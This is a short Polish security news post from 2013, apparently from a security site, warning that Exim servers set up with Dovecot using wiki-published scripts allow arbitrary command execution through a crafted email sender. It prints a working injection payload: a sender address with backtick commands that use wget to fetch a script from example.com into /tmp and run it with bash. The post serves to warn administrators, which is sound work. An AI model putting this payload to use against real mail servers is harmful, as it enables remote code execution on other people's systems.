04.05.2013 | 08:12

Adam Haertle

Poważny błąd w konfiguracji Exim + Dovecot

Jeśli Wasz Exim korzysta z Dovecota i skonfigurowaliście go w oparciu o skrypty opublikowane na wiki Dovecota, to prawdopodobnie można na Waszym serwerze wykonać dowolne polecenie poprzez skierowanie do niego emaila od nadawcy

red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`[email protected]

Polecamy lekturę na temat szczegółów błędu.

Powrót

Zostaw odpowiedź

Jeśli chcesz zwrócić uwagę na literówkę lub inny błąd techniczny, zapraszamy do formularza kontaktowego. Reagujemy równie szybko.

Poważny błąd w konfiguracji Exim + Dovecot

Komentarze